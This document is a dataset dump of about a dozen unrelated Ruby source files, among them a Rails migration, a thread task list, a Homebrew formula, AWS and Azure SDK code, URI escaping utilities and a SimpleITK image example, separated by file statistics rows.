class AddSummaryToProjects < ActiveRecord::Migration
def self.up
add_column :projects, :summary, :text
end
def self.down
remove_column :projects, :summary
end
end
| 35.974359 | 91 | 0.756237 |
61c0bb0cbb43aa64dec2be59a129387f12bdd560 | 1,972 | require 'thread'
require 'timeout'
module Rbgo
using CoRunExtensions
class TaskList
attr_accessor :last_error
def <<(task)
task_queue << task
self
end
def add(task, timeout: nil, skip_on_exception: false)
task_queue << proc do |last_task_result|
begin
Timeout::timeout(timeout) do
task.call(last_task_result)
end
rescue Exception => ex
self.last_error = ex
raise unless skip_on_exception
end
end
self
end
def start(arg = nil)
start_once.do do
_start(arg)
end
nil
end
def clear_task
task_queue.clear
end
def running?
running
end
def complete?
!running? && task_queue.empty?
end
def wakeup
wait_cond.signal
end
def wait(timeout = nil)
wait_mutex.synchronize do
if running?
wait_cond.wait(wait_mutex, timeout)
end
end
end
private
attr_accessor :task_queue, :start_once, :running, :wait_mutex, :wait_cond
def initialize
self.task_queue = Queue.new
self.start_once = Once.new
self.running = false
self.wait_mutex = Mutex.new
self.wait_cond = ConditionVariable.new
end
def notify
wait_mutex.synchronize do
self.running = false
wait_cond.signal
end
end
def _start(arg = nil)
self.last_error = nil unless running?
self.running = true
go(arg) do |last_task_result|
begin
task = task_queue.deq(true)
rescue ThreadError
notify
self.start_once = Once.new
else
begin
res = task.call(last_task_result)
rescue Exception => ex
self.last_error = ex
notify
self.start_once = Once.new
else
_start(res)
end
end
end
end
end
end | 19.333333 | 77 | 0.56643 |
08647c91333c439e68ed1f9dc1be9dc8a9b3dcd8 | 872 | require 'yaml'
def _spawner2(_name, _modelURI, _worldName, _x, _y, _z, _roll, _pitch, _yaw, _additionalSDF='')
base_spawn = `rospack find ctu_cras_norlab_absolem_sensor_config_1`.chomp + "/launch/common.rb"
begin
load base_spawn
rescue LoadError
raise "Unknown robot configuration #{_modelURI}. #{base_spawn} could not be found."
else
max_velocity = 0.6
_spawner(_name, _modelURI, _worldName, _x, _y, _z, _roll, _pitch, _yaw, _additionalSDF, max_velocity)
end
end
def _rosExecutables2(_name, _worldName)
<<-HEREDOC
<executable name='topics'>
<command>roslaunch --wait ctu_cras_norlab_absolem_sensor_config_1 vehicle_topics.launch world_name:=#{_worldName} name:=#{_name} revision:=2021 has_cliff_sensors:=1 description_print_command:="#{File.dirname(__FILE__) + '/../scripts/print_robot_urdf'}"</command>
</executable>
HEREDOC
end
| 37.913043 | 266 | 0.751147 |
26619c222912b6bd99d7070b2fb922c84ab32742 | 319 | require "../lib/Goofy"
require "goofy/contrib"
Goofy.plugin Goofy::Mote
ITEMS = ("A".."Z").to_a
Goofy.send :remove_const, :Response
Goofy::Response = Rack::Response
Goofy.define do
def mote_vars(content)
{ content: content }
end
on default do
res.write view("home", list: ITEMS)
end
end
run Goofy
| 14.5 | 39 | 0.683386 |
4a23e5a825e6ffb1b4416e875ddf5f3bc2052e21 | 1,469 | require 'hanami/utils/file_list'
module Hanami
module Assets
# Requested asset
#
# @since 0.8.0
# @api private
class Asset
# @since 0.8.0
# @api private
PUBLIC_DIRECTORY = Hanami.public_directory.join('**', '*').to_s.freeze
# @since 0.8.0
# @api private
URL_SEPARATOR = '/'.freeze
# @since 0.8.0
# @api private
attr_reader :path
# @since 0.8.0
# @api private
attr_reader :config
# @since 0.8.0
# @api private
attr_reader :original
# @since 0.8.0
# @api private
def initialize(sources, path)
@path = path
@prefix, @config = sources.find { |p, _| path.start_with?(p) }
if @prefix && @config
@original = @config.sources.find(@path.sub(@prefix, ''))
end
end
# @since 0.8.0
# @api private
def precompile?
original && config
end
# @since 0.8.0
# @api private
def exist?
return true unless original.nil?
file_path = path.tr(URL_SEPARATOR, ::File::SEPARATOR)
destination = find_asset do |a|
a.end_with?(file_path)
end
!destination.nil?
end
private
# @since 0.8.0
# @api private
def find_asset
Utils::FileList[PUBLIC_DIRECTORY].find do |asset|
yield asset unless ::File.directory?(asset)
end
end
end
end
end
| 20.402778 | 76 | 0.533696 |
010392ccda2918d171abb36d5fbd9ab7023e31fc | 1,295 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
Gem::Specification.new do |spec|
spec.name = 'aws-sdk-codepipeline'
spec.version = File.read(File.expand_path('../VERSION', __FILE__)).strip
spec.summary = 'AWS SDK for Ruby - CodePipeline'
spec.description = 'Official AWS Ruby gem for AWS CodePipeline (CodePipeline). This gem is part of the AWS SDK for Ruby.'
spec.author = 'Amazon Web Services'
spec.homepage = 'https://github.com/aws/aws-sdk-ruby'
spec.license = 'Apache-2.0'
spec.email = ['[email protected]']
spec.require_paths = ['lib']
spec.files = Dir['LICENSE.txt', 'CHANGELOG.md', 'VERSION', 'lib/**/*.rb']
spec.metadata = {
'source_code_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/version-3/gems/aws-sdk-codepipeline',
'changelog_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/version-3/gems/aws-sdk-codepipeline/CHANGELOG.md'
}
spec.add_dependency('aws-sdk-core', '~> 3', '>= 3.121.2')
spec.add_dependency('aws-sigv4', '~> 1.1')
spec.required_ruby_version = '>= 2.3'
end
| 39.242424 | 125 | 0.671042 |
625b7f07ac0f3d5f575e271f358d2548a00653aa | 3,130 | class Libspatialite < Formula
desc "Adds spatial SQL capabilities to SQLite"
homepage "https://www.gaia-gis.it/fossil/libspatialite/index"
revision 8
stable do
url "https://www.gaia-gis.it/gaia-sins/libspatialite-sources/libspatialite-4.3.0a.tar.gz"
mirror "https://ftp.netbsd.org/pub/pkgsrc/distfiles/libspatialite-4.3.0a.tar.gz"
mirror "https://www.mirrorservice.org/sites/ftp.netbsd.org/pub/pkgsrc/distfiles/libspatialite-4.3.0a.tar.gz"
sha256 "88900030a4762904a7880273f292e5e8ca6b15b7c6c3fb88ffa9e67ee8a5a499"
patch do
url "https://raw.githubusercontent.com/Homebrew/formula-patches/27a0e51936e01829d0a6f3c75a7fbcaf92bb133f/libspatialite/sqlite310.patch"
sha256 "459434f5e6658d6f63d403a7795aa5b198b87fc9f55944c714180e7de662fce2"
end
end
livecheck do
url "https://www.gaia-gis.it/gaia-sins/libspatialite-sources/"
regex(/href=.*?libspatialite[._-]v?(\d+(?:\.\d+)+[a-z]?)\.t/i)
end
bottle do
cellar :any
sha256 "e8bd429119857fab4cb51f3ba7b64024b51eb2400873e71fc9d6aad297c109ce" => :catalina
sha256 "8fcc2ccaf861f94c3fb41b1c6435e86f52a7fe70e66d9e02a5acb16d285c4360" => :mojave
sha256 "a77ac13e3758d389ccf42fa62d8a7bb528062c215e2b380b8d3df7211696712f" => :high_sierra
end
head do
url "https://www.gaia-gis.it/fossil/libspatialite", using: :fossil
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
end
depends_on "pkg-config" => :build
depends_on "freexl"
depends_on "geos"
depends_on "libxml2"
depends_on "proj"
# Needs SQLite > 3.7.3 which rules out system SQLite on Snow Leopard and
# below. Also needs dynamic extension support which rules out system SQLite
# on Lion. Finally, RTree index support is required as well.
depends_on "sqlite"
def install
system "autoreconf", "-fi" if build.head?
# New SQLite3 extension won't load via SELECT load_extension("mod_spatialite");
# unless named mod_spatialite.dylib (should actually be mod_spatialite.bundle)
# See: https://groups.google.com/forum/#!topic/spatialite-users/EqJAB8FYRdI
# needs upstream fixes in both SQLite and libtool
inreplace "configure",
"shrext_cmds='`test .$module = .yes && echo .so || echo .dylib`'",
"shrext_cmds='.dylib'"
chmod 0755, "configure"
# Ensure Homebrew's libsqlite is found before the system version.
sqlite = Formula["sqlite"]
ENV.append "LDFLAGS", "-L#{sqlite.opt_lib}"
ENV.append "CFLAGS", "-I#{sqlite.opt_include}"
# Use Proj 6.0.0 compatibility headers.
# Remove in libspatialite 5.0.0
ENV.append_to_cflags "-DACCEPT_USE_OF_DEPRECATED_PROJ_API_H"
args = %W[
--disable-dependency-tracking
--prefix=#{prefix}
--with-sysroot=#{HOMEBREW_PREFIX}
--enable-geocallbacks
]
system "./configure", *args
system "make", "install"
end
test do
# Verify mod_spatialite extension can be loaded using Homebrew's SQLite
pipe_output("#{Formula["sqlite"].opt_bin}/sqlite3",
"SELECT load_extension('#{opt_lib}/mod_spatialite');")
end
end
| 36.823529 | 141 | 0.715335 |
b94a65aa929027eee21337ec0c35b2bcdb77f8e0 | 4,211 | # frozen_string_literal: true
require_relative "error"
module Ensql
class << self
# Get the current connection adapter. If not specified, it will try to
# autoload an adapter based on the availability of Sequel or ActiveRecord,
# in that order.
#
# @example
# require 'sequel'
# Ensql.adapter # => Ensql::SequelAdapter.new
# Ensql.adapter = Ensql::ActiveRecordAdapter.new # override adapter
# Ensql.adapter = my_tsql_adapter # supply your own adapter
#
def adapter
Thread.current[:ensql_adapter] || Thread.main[:ensql_adapter] ||= autoload_adapter
end
# Set the connection adapter to use. Must implement the interface defined in
# {Ensql::Adapter}. This uses a thread-local variable so adapters can be
# switched safely in a multi-threaded web server.
def adapter=(adapter)
if adapter.is_a?(Module) && (adapter.name == "Ensql::SequelAdapter" || adapter.name == "Ensql::ActiveRecordAdapter")
warn "Using `#{adapter}` as an adapter is deprecated, use `#{adapter}.new`.", uplevel: 1
end
Thread.current[:ensql_adapter] = adapter
end
private
def autoload_adapter
if defined? Sequel
require_relative "sequel_adapter"
SequelAdapter.new
elsif defined? ActiveRecord
require_relative "active_record_adapter"
ActiveRecordAdapter.new
else
raise Error, "Couldn't autodetect an adapter, please specify manually."
end
end
end
#
# @abstract Do not use this module directly.
#
# A common interface for executing SQL statements and retrieving (or not)
# their results. Some methods have predefined implementations for convenience
# that can be improved in the adapters.
#
module Adapter
# @!group 1. Interface Methods
# @!method literalize(value)
#
# Convert a Ruby object into a string that can be safely interpolated into
# an SQL statement. Strings will be correctly quoted. The precise result
# will depend on the adapter and the underlying database driver, but most
# RDBMs have limited ways to express literals.
#
# @return [String] a properly quoted SQL literal
#
# @see https://www.postgresql.org/docs/13/sql-syntax-lexical.html#SQL-SYNTAX-CONSTANTS
# @see https://dev.mysql.com/doc/refman/8.0/en/literals.html
# @see https://sqlite.org/lang_expr.html#literal_values_constants_
#
# @example
# literalize("It's quoted") # => "'It''s quoted'"
# literalize(1.23) # => "1.23"
# literalize(true) # => "1"
# literalize(nil) # => "NULL"
# literalize(Time.now) # => "'2021-02-22 23:44:28.942947+1300'"
# @!method fetch_rows(sql)
#
# Execute the query and return an array of rows represented by { column => field }
# hashes. Fields should be deserialised depending on the column type.
#
# @return [Array<Hash>] rows as hashes keyed by column name
# @!method fetch_each_row(sql)
#
# Execute the query and yield each resulting row. This should provide a more
# efficient method of iterating through large datasets.
#
# @yield <Hash> row
# @!method fetch_count(sql)
#
# Execute the statement and return the number of rows affected. Typically
# used for DELETE, UPDATE, INSERT, but will work with SELECT on some
# databases.
#
# @return <Integer> the number of rows affected by the statement
# @!method run(sql)
#
# Execute the statement on the database without returning any result. This
# can avoid the overhead of other fetch_* methods.
#
# @return <void>
# @!group 2. Predefined Methods
# Execute the query and return only the first row of the result.
# @return <Hash>
def fetch_first_row(sql)
fetch_each_row(sql).first
end
# Execute the query and return only the first column of the result.
# @return <Array>
def fetch_first_column(sql)
fetch_rows(sql).map(&:values).map(&:first)
end
# Execute the query and return only the first field of the first row of the result.
def fetch_first_field(sql)
fetch_first_row(sql)&.values&.first
end
end
end
| 33.420635 | 122 | 0.6692 |
616a14265b6ad3ef5656b52f4a2e42709d5466a7 | 12,663 | # A bunch of helpers for efficiently generating select options for taggable
# content, e.g. topics, organisations, etc.
module Admin::TaggableContentHelper
# Returns an Array that represents the current set of taggable topics.
# Each element of the array consists of two values: the name and ID of the
# topic.
def taggable_topics_container
Rails.cache.fetch(taggable_topics_cache_digest, expires_in: 1.day) do
Topic.order(:name).map { |t| [t.name, t.id] }
end
end
# Returns an Array that represents the current set of taggable topical
# events. Each element of the array consists of two values: the name and ID
# of the topical event.
def taggable_topical_events_container
Rails.cache.fetch(taggable_topical_events_cache_digest, expires_in: 1.day) do
TopicalEvent.order(:name).map { |te| [te.name, te.id] }
end
end
# Returns an Array that represents the current set of taggable organisations.
# Each element of the array consists of two values: the select_name and the
# ID of the organisation
def taggable_organisations_container
Rails.cache.fetch(taggable_organisations_cache_digest, expires_in: 1.day) do
Organisation.with_translations.order(:name).map { |o| [o.select_name, o.id] }
end
end
# Returns an Array that represents the current set of taggable ministerial
# role appointments (both past and present). Each element of the array
# consists of two values: a selectable label (consisting of the person, the
# role, the date the role was held if it's in the past, and the organisations
# the person belongs to) and the ID of the role appointment.
def taggable_ministerial_role_appointments_container
Rails.cache.fetch(taggable_ministerial_role_appointments_cache_digest, expires_in: 1.day) do
role_appointments_container_for(RoleAppointment.for_ministerial_roles)
end
end
# Returns an Array that represents the current set of taggable roles (both
# past and present). Each element of the array consists of two values: a
# selectable label (consisting of the person, the role, the date the role was
# held if it's in the past, and the organisations the person belongs to) and
# the ID of the role appointment.
def taggable_role_appointments_container
Rails.cache.fetch(taggable_role_appointments_cache_digest, expires_in: 1.day) do
role_appointments_container_for(RoleAppointment)
end
end
# Returns an Array that represents the taggable ministerial roles. Each
# element of the array consists of two values: the name of the ministerial
# role with the organisation and current holder and its ID.
def taggable_ministerial_roles_container
Rails.cache.fetch(taggable_ministerial_roles_cache_digest, expires_in: 1.day) do
MinisterialRole.with_translations.with_translations_for(:organisations).alphabetical_by_person.map do |role|
["#{role.name}, #{role.organisations.map(&:name).to_sentence} (#{role.current_person_name})", role.id]
end
end
end
# Returns an Array that represents the current set of taggable detauled
# guides. Each element of the array consists of two values: the guide title
# and its ID.
def taggable_detailed_guides_container
Rails.cache.fetch(taggable_detailed_guides_cache_digest, expires_in: 1.day) do
DetailedGuide.alphabetical.latest_edition.active.map {|d| [d.title, d.id] }
end
end
# Returns an Array that represents the current set of taggable statistical
# data sets. Each elements of the array consists of two values: the data
# set title and its ID.
def taggable_statistical_data_sets_container
Rails.cache.fetch(taggable_statistical_data_sets_cache_digest, expires_in: 1.day) do
StatisticalDataSet.with_translations.latest_edition.map do |data_set|
[data_set.title, data_set.document_id]
end
end
end
# Returns an Array that represents the taggable published worldwide
# priorities. Each element of the array consists of two values: the
# worldwide priority title and its ID.
def taggable_worldwide_priorities_container
Rails.cache.fetch(taggable_worldwide_priorities_cache_digest, expires_in: 1.day) do
WorldwidePriority.alphabetical.published.map {|w| [w.title, w.id] }
end
end
# Returns an Array that represents the taggable policies. Each element of the
# array consists of two values: the policy title (including topics) and its
# ID.
def taggable_policies_container
Rails.cache.fetch(taggable_policies_cache_digest, expires_in: 1.day) do
Policy.latest_edition.with_translations.includes(:topics).active.map do |policy|
[policy.title_with_topics, policy.id]
end
end
end
# Returns an Array that represents the taggable world locations. Each element
# of the array consists of two values: the location name and its ID
def taggable_world_locations_container
Rails.cache.fetch(taggable_world_locations_cache_digest, expires_in: 1.day) do
WorldLocation.ordered_by_name.map {|w| [w.name, w.id] }
end
end
# Returns an Array that represents the taggable alternative format providers.
# Each element of the array consists of two values: the label (organisation
# and the email address if avaiable) and the ID of the organisation.
def taggable_alternative_format_providers_container
Rails.cache.fetch(taggable_alternative_format_providers_cache_digest, expires_in: 1.day) do
Organisation.alphabetical.map do |o|
["#{o.name} (#{o.alternative_format_contact_email.blank? ? "-" : o.alternative_format_contact_email})", o.id]
end
end
end
# Returns an Array representing the taggable document collections and their
# groups. Each element of the array consists of two values: the
# collection/group name and the ID of the group.
def taggable_document_collection_groups_container
Rails.cache.fetch(taggable_document_collection_groups_cache_digest, expires_in: 1.day) do
DocumentCollection.latest_edition.alphabetical.includes(:groups).flat_map do |collection|
collection.groups.map { |group| ["#{collection.title} (#{group.heading})", group.id] }
end
end
end
# Returns an Array that represents the taggable worldwide organisations.
# Each element of the array consists of two values: the name of the worldwide
# organisation and its ID.
def taggable_worldwide_organisations_container
Rails.cache.fetch(taggable_worldwide_organisations_cache_digest, expires_in: 1.day) do
WorldwideOrganisation.with_translations.all.map {|wo| [wo.name, wo.id] }
end
end
# Returns an MD5 digest representing the current set of taggable topics. This
# will change if any of the Topics should change or if a new topic is added.
def taggable_topics_cache_digest
@_taggable_topics_cache_digest ||= calculate_digest(Topic.order(:id), 'topics')
end
# Returns an MD5 digest representing the current set of taggable topical
# events. This will change if any of the Topics should change or if a new
# topic event is added.
def taggable_topical_events_cache_digest
@_taggable_topical_events_cache_digest ||= calculate_digest(TopicalEvent.order(:id), 'topical-events')
end
# Returns an MD5 digest representing the current set of taggable
# organisations. This will change if any of the Topics should change or if a
# new organisation is added.
def taggable_organisations_cache_digest
@_taggable_organisations_cache_digest ||= calculate_digest(Organisation.order(:id), 'organisations')
end
# Returns an MD5 digest representing the current set of taggable ministerial
# role appointments. This will change if any role appointments are added or
# changed, and also if an occupied MinisterialRole is updated.
def taggable_ministerial_role_appointments_cache_digest
@_taggable_ministerial_role_appointments_cache_digest ||= begin
calculate_digest(RoleAppointment.
joins(:role).
where(roles: { type: MinisterialRole}).
order("role_appointments.id"), 'ministerial-role-appointments')
end
end
# Returns an MD5 digest representing the current set of taggable ministerial
# role appointments. This will change if any role appointments are added or
# changed, and also if an occupied Role is updated.
def taggable_role_appointments_cache_digest
@_taggable_role_appointments_cache_digest ||= calculate_digest(RoleAppointment.order(:id), 'role-appointments')
end
# Returns an MD5 digest representing the current set of taggable ministerial
# rile appointments. THis will change if any ministerial role is added or
# updated.
def taggable_ministerial_roles_cache_digest
@_taggable_ministerial_roles_cache_digest ||= calculate_digest(MinisterialRole.order(:id), 'ministerial-roles')
end
# Returns an MD5 digest representing all the detailed guides. This wil change
# if any detailed guides are added or updated.
def taggable_detailed_guides_cache_digest
@_taggable_detailed_guides_cache_digest ||= calculate_digest(Document.where(document_type: DetailedGuide).order(:id), 'detailed-guides')
end
# Returns an MD5 digest representing the taggable statistical data sets. This
# will change if any statistical data set is added or updated.
def taggable_statistical_data_sets_cache_digest
@_taggable_statistical_data_sets_cache_digest ||= calculate_digest(Document.where(document_type: StatisticalDataSet).order(:id), 'statistical-data-sets')
end
# Returns an MD5 digest representing the taggable worldwide priorities. This
# will change if any worldwide priorities are added or updated.
def taggable_worldwide_priorities_cache_digest
@_taggable_worldwide_priorities_cache_digest ||= calculate_digest(Document.where(document_type: WorldwidePriority).order(:id), 'worldwide-priorities')
end
# Returns an MD5 digest representing the taggable policies. This will change
# if any policies are added or updated.
def taggable_policies_cache_digest
@_taggable_policies_cache_digest ||= calculate_digest(Document.where(document_type: Policy).order(:id), 'policies')
end
# Returns an MD5 digest representing the taggable world locations. This will
# change if any world locations are added or updated.
def taggable_world_locations_cache_digest
@_taggable_world_locations_cache_digest ||= calculate_digest(WorldLocation.order(:id), 'world-locations')
end
# Returns an MD5 digest representing the taggable alternative format
# providers. This will change if any alternative format providers are
# changed.
def taggable_alternative_format_providers_cache_digest
@_taggable_alternative_format_providers_cache_digest ||= calculate_digest(Organisation.order(:id), 'alternative-format-providers')
end
# Returns an MD5 digest representing the taggable document collection
# groups. This will change if any document collection or group within
# the collection is changed or any new ones are added.
def taggable_document_collection_groups_cache_digest
@_taggable_document_collection_groups_cache_digest ||= calculate_digest(Document.where(document_type: DocumentCollection).order(:id), 'document-collection-groups')
end
# Returns an MD5 digest representing the taggable worldwide organisations.
# This will change if any worldwide organisations are added or updated.
def taggable_worldwide_organisations_cache_digest
@_taggable_worldwide_organisations_cache_digest ||= calculate_digest(WorldwideOrganisation.order(:id), 'worldwide-organisations')
end
# Note: Taken from Rails 4
def cache_if(condition, name = {}, options = nil, &block)
if condition
cache(name, options, &block)
else
yield
end
nil
end
private
def calculate_digest(scope, digest_name)
update_timestamps = scope.pluck(:updated_at).map(&:to_i).join
Digest::MD5.hexdigest "taggable-#{digest_name}-#{update_timestamps}"
end
def role_appointments_container_for(scope)
scope.
includes(:person).
with_translations_for(:organisations).
with_translations_for(:role).
alphabetical_by_person.map { |appointment| [role_appointment_label(appointment), appointment.id] }
end
def role_appointment_label(appointment)
organisations = appointment.organisations.map(&:name).to_sentence
person = appointment.person.name
role = appointment.role.name.dup
unless appointment.current?
role << " (#{l(appointment.started_at.to_date)} to #{l(appointment.ended_at.to_date)})"
end
[person, role, organisations].join(', ')
end
end
| 45.714801 | 167 | 0.765932 |
1ac86d10d6f6aac14b3108f28cdbaaa9dadbc405 | 3,165 | module ActionDispatch
module Journey # :nodoc:
class Router # :nodoc:
class Utils # :nodoc:
# Normalizes URI path.
#
# Strips off trailing slash and ensures there is a leading slash.
# Also converts downcase URL encoded string to uppercase.
#
# normalize_path("/foo") # => "/foo"
# normalize_path("/foo/") # => "/foo"
# normalize_path("foo") # => "/foo"
# normalize_path("") # => "/"
# normalize_path("/%ab") # => "/%AB"
def self.normalize_path(path)
encoding = path.encoding
path = "/#{path}".dup
path.squeeze!("/".freeze)
path.sub!(%r{/+\Z}, "".freeze)
path.gsub!(/(%[a-f0-9]{2})/) { $1.upcase }
path = "/".dup if path == "".freeze
path.force_encoding(encoding)
path
end
# URI path and fragment escaping
# http://tools.ietf.org/html/rfc3986
class UriEncoder # :nodoc:
ENCODE = "%%%02X".freeze
US_ASCII = Encoding::US_ASCII
UTF_8 = Encoding::UTF_8
EMPTY = "".dup.force_encoding(US_ASCII).freeze
DEC2HEX = (0..255).to_a.map { |i| ENCODE % i }.map { |s| s.force_encoding(US_ASCII) }
ALPHA = "a-zA-Z".freeze
DIGIT = "0-9".freeze
UNRESERVED = "#{ALPHA}#{DIGIT}\\-\\._~".freeze
SUB_DELIMS = "!\\$&'\\(\\)\\*\\+,;=".freeze
ESCAPED = /%[a-zA-Z0-9]{2}/.freeze
FRAGMENT = /[^#{UNRESERVED}#{SUB_DELIMS}:@\/\?]/.freeze
SEGMENT = /[^#{UNRESERVED}#{SUB_DELIMS}:@]/.freeze
PATH = /[^#{UNRESERVED}#{SUB_DELIMS}:@\/]/.freeze
def escape_fragment(fragment)
escape(fragment, FRAGMENT)
end
def escape_path(path)
escape(path, PATH)
end
def escape_segment(segment)
escape(segment, SEGMENT)
end
def unescape_uri(uri)
encoding = uri.encoding == US_ASCII ? UTF_8 : uri.encoding
uri.gsub(ESCAPED) { |match| [match[1, 2].hex].pack("C") }.force_encoding(encoding)
end
private
def escape(component, pattern)
component.gsub(pattern) { |unsafe| percent_encode(unsafe) }.force_encoding(US_ASCII)
end
def percent_encode(unsafe)
safe = EMPTY.dup
unsafe.each_byte { |b| safe << DEC2HEX[b] }
safe
end
end
ENCODER = UriEncoder.new
def self.escape_path(path)
ENCODER.escape_path(path.to_s)
end
def self.escape_segment(segment)
ENCODER.escape_segment(segment.to_s)
end
def self.escape_fragment(fragment)
ENCODER.escape_fragment(fragment.to_s)
end
# Replaces any escaped sequences with their unescaped representations.
#
# uri = "/topics?title=Ruby%20on%20Rails"
# unescape_uri(uri) #=> "/topics?title=Ruby on Rails"
def self.unescape_uri(uri)
ENCODER.unescape_uri(uri)
end
end
end
end
end
| 31.65 | 98 | 0.524171 |
e8126a38e218a7e76352d4b5f0ee224ef12f711c | 3,066 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::DataFactory::Mgmt::V2018_06_01
module Models
#
# A copy activity Phoenix server source.
#
class PhoenixSource < TabularSource
include MsRestAzure
def initialize
@type = "PhoenixSource"
end
attr_accessor :type
# @return A query to retrieve data from source. Type: string (or
# Expression with resultType string).
attr_accessor :query
#
# Mapper for PhoenixSource class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'PhoenixSource',
type: {
name: 'Composite',
class_name: 'PhoenixSource',
model_properties: {
additional_properties: {
client_side_validation: true,
required: false,
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'ObjectElementType',
type: {
name: 'Object'
}
}
}
},
source_retry_count: {
client_side_validation: true,
required: false,
serialized_name: 'sourceRetryCount',
type: {
name: 'Object'
}
},
source_retry_wait: {
client_side_validation: true,
required: false,
serialized_name: 'sourceRetryWait',
type: {
name: 'Object'
}
},
max_concurrent_connections: {
client_side_validation: true,
required: false,
serialized_name: 'maxConcurrentConnections',
type: {
name: 'Object'
}
},
type: {
client_side_validation: true,
required: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
query_timeout: {
client_side_validation: true,
required: false,
serialized_name: 'queryTimeout',
type: {
name: 'Object'
}
},
query: {
client_side_validation: true,
required: false,
serialized_name: 'query',
type: {
name: 'Object'
}
}
}
}
}
end
end
end
end
| 27.872727 | 70 | 0.445205 |
396946ba834efc69e16992fc8c4878819dd0c619 | 1,908 | # frozen_string_literal: true
module CurrentUser
extend ActiveSupport::Concern
included do
helper_method :current_user
around_action :login_user
# we record with reliable reset
skip_before_action :set_paper_trail_enabled_for_controller
skip_before_action :set_paper_trail_controller_info
end
private
def current_user
@current_user ||= warden.user
end
# Called from SessionsController for OmniAuth
def current_user=(user)
warden.set_user(user, event: :authentication)
end
def logout!
warden.logout
end
def login_user
warden.authenticate || unauthorized!
PaperTrail.with_whodunnit_user(current_user) { yield }
end
def warden
request.env['warden']
end
def unauthorized!
Rails.logger.warn "Halted as unauthorized! threw :warden (called from #{caller.first.sub(Rails.root.to_s, '')})"
throw :warden # Warden::Manager middleware catches this and calls UnauthorizedController
end
def authorize_super_admin!
unauthorized! unless current_user.super_admin?
end
def authorize_admin!
unauthorized! unless current_user.admin?
end
def authorize_project_admin!
unauthorized! unless current_user.admin_for?(current_project)
end
def authorize_deployer!
unauthorized! unless current_user.deployer?
end
def authorize_project_deployer!
unauthorized! unless current_user.deployer_for?(current_project)
end
# tested via access checks in the actual controllers
def authorize_resource!
case controller_name
when 'builds'
authorize_project_deployer!
when 'locks'
if @project
authorize_project_deployer!
else
authorize_admin!
end
when 'users'
if ['index', 'show'].include?(action_name)
authorize_admin!
else
authorize_super_admin!
end
else
raise "Unsupported controller"
end
end
end
| 22.447059 | 116 | 0.726939 |
e2985e945e9ade1b368c62905e8d4e0f09b0a380 | 258 | class AddUniqueConstraintToProfessionalLearningPartners < ActiveRecord::Migration[5.0]
def change
change_table :professional_learning_partners do |t|
t.remove_index column: :name
t.index [:name, :contact_id], unique: true
end
end
end
| 28.666667 | 86 | 0.748062 |
4a406bb48758d7d20bdf6191e3944177d62adea0 | 102 | class ApplicationMailer < ActionMailer::Base
default from: '[email protected]'
layout 'mailer'
end
| 20.4 | 44 | 0.764706 |
d5f618799d59404cc8d58279c71a919933a0ef8e | 2,488 | #=========================================================================
#
# Copyright NumFOCUS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#=========================================================================
require 'simpleitk'
# Create an image
pixelType = Simpleitk::SitkUInt8
imageSize = Simpleitk::VectorUInt32.new
imageSize << 128
imageSize << 128
image = Simpleitk::Image.new( imageSize, pixelType )
# Create a face image
faceSize = Simpleitk::VectorDouble.new
faceSize << 64
faceSize << 64
faceCenter = Simpleitk::VectorDouble.new
faceCenter << 64
faceCenter << 64
face = Simpleitk::gaussian_source( pixelType, imageSize, faceSize, faceCenter )
# Create eye images
eyeSize = Simpleitk::VectorDouble.new
eyeSize << 5
eyeSize << 5
eye1Center = Simpleitk::VectorDouble.new
eye1Center << 48
eye1Center << 48
eye2Center = Simpleitk::VectorDouble.new
eye2Center << 80
eye2Center << 48
eye1 = Simpleitk::gaussian_source( pixelType, imageSize, eyeSize, eye1Center, 150 )
eye2 = Simpleitk::gaussian_source( pixelType, imageSize, eyeSize, eye2Center, 150 )
# Apply the eyes to the face
face = Simpleitk.subtract( face, eye1 )
face = Simpleitk.subtract( face, eye2 )
face = Simpleitk.binary_threshold( face, 200, 255, 255 );
# Create the mouth
mouthRadii = Simpleitk::VectorDouble.new
mouthRadii << 30
mouthRadii << 20
mouthCenter = Simpleitk::VectorDouble.new
mouthCenter << 64
mouthCenter << 76
mouth = Simpleitk::gaussian_source( pixelType, imageSize, mouthRadii, mouthCenter )
mouth = Simpleitk::binary_threshold( mouth, 200, 255, 255 )
mouth = Simpleitk::subtract( 255, mouth )
# Paste the mouth onto the face
mouthSize = Simpleitk::VectorUInt32.new
mouthSize << 64
mouthSize << 18
mouthLoc = Simpleitk::VectorInt32.new
mouthLoc << 32
mouthLoc << 76
face = Simpleitk::paste( face, mouth, mouthSize, mouthLoc, mouthLoc )
# Apply the face to the original image
image = Simpleitk.add( image, face )
Simpleitk.show( image, "Hello World: Ruby", true )
| 31.1 | 83 | 0.706994 |
8760019dad155ad4e118e0b1b914c3bd984ae3d2 | 1,587 | #
# Be sure to run `pod lib lint YMNetworking.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'YMNetworking'
s.version = '0.1.0'
s.summary = ' YMNetworking.'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
s.homepage = 'https://github.com/ModuleProject/YMNetworking'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
